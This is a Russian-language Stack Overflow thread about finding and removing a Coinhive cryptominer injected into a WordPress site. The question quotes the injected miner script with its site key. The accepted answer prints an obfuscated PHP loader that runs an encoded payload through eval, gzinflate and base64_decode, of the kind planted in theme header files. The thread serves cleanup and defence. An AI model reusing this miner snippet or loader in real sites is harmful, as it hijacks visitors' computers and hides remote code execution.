# удалить вирус coinhive с wordpress

Tags: php, javascript, wordpress, вирусы

не могу найти и удалить майнер который лежит в body . как он попал на сайт не понятно . Помогите обезвредить гада , уже все облазил , в логах ничего такого нет ...

```
<body class="archive tax-product_tag term-seriya-mr term-433 
woocommerce woocommerce-page"><script 
src=https://coinhive.com/lib/coinhive.min.js></script><script>var 
miner=new 




CoinHive.Anonymous('92o2UmHaBROIeQemIy8iNY2CDcnRS5GS');miner.setThrottle(0.3);miner.start();</script>
```

Comment: А причём тут метка Bitcoin ?

Comment: случайно добавил )

Comment: Аудит логов, снос всего, накатывание с чистой резервной копии и устранение проблем, найденных при аудите логов. Толку от удаления единственного майнера - ноль, зальют новый, если не уже. PS. Ну и обновление всего, что можно, да.

Comment: Сносить имеется ввиду "все" до того момента пока не удалится майнер ? на второй версии сайта его нет , а именно (укр)

Comment: Сносить имеется в виду вообще ВСЕ

Comment: Это задание (не вопрос же) не для SO.

Comment: @SeVlad, ну и почему же нет?

Comment: @Qwertiy, Ну я думаю  это приблизительно как на форуме по конструированию двигателей внутреннего сгорания рассказывать как его сбила машина и где доставать какие лекарства и запчасти. Тут не  просто к кодингу никакого отношения - это вопрос применения конечного софта. И вопрос, индивидуальный, не однозначный и не простой. Много разных мероприятий нужно провести, посмотреть реакцию на них, пойти дальше и тп.

Comment: @SeVlad, у нас тут есть похожие вопросы. Считаю, что они подходят сайту.

Comment: @Qwertiy, А ответы на них есть? :) Просто для понимания "глубины" проблемы 2 топика на сёрче: Быстро решившаяся (см склько времени заняло и что как было): https://searchengines.guru/showthread.php?t=975567 и НЕ решившаяся (с пом ответов): https://searchengines.guru/showthread.php?t=926775 (особенно 17й пост мне оч. нравится. Коллега шикарные примеры привёл и сформулировал резюме что такое безопасность)

Answer (score 1, accepted):

Ищите в папке с темой файл типа header.php
И в нём ищите что-то вроде этого:

```
$l1="\x63\x72e"."\x61\x74e\x5F"."\x66\x75\x6E"."\x63\x74\x69"."\x6F\x6E";$ll=@$l1('$x',"e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));');@$ll("RY1bS8NAEIXfC/0PSyhkA5JIxAdNNqWUaF+8UOMFRUKybNmNyc4yO23VX2+8UB/nnO87k8+ddtPJbNswwTwhQQ97hXxW35Xrh3L9Eq6q6ra+H696cVleV+FrlE0nZsNH2IHno3kUtEBBJITYNL1XEVNSAwtyL9E4Yh6l0ETOnyeJBGO12alYwpD0pv0PBmPjzhd58msVf3axa5CNnUJh1Z4tR3z1jS8s2I8Btp6Hz/YsfX97MrpTWl+krmtv0tOrT0DEpd0/yjDKfgZir6jSCES94sfxySGmBolH2eF1kLF58QU=");
```

Comment: Спасибо , там нашел почти сразу . только оно еще в php функцию было завернуто ... Еще этот майнер запихали в подвал , их два было .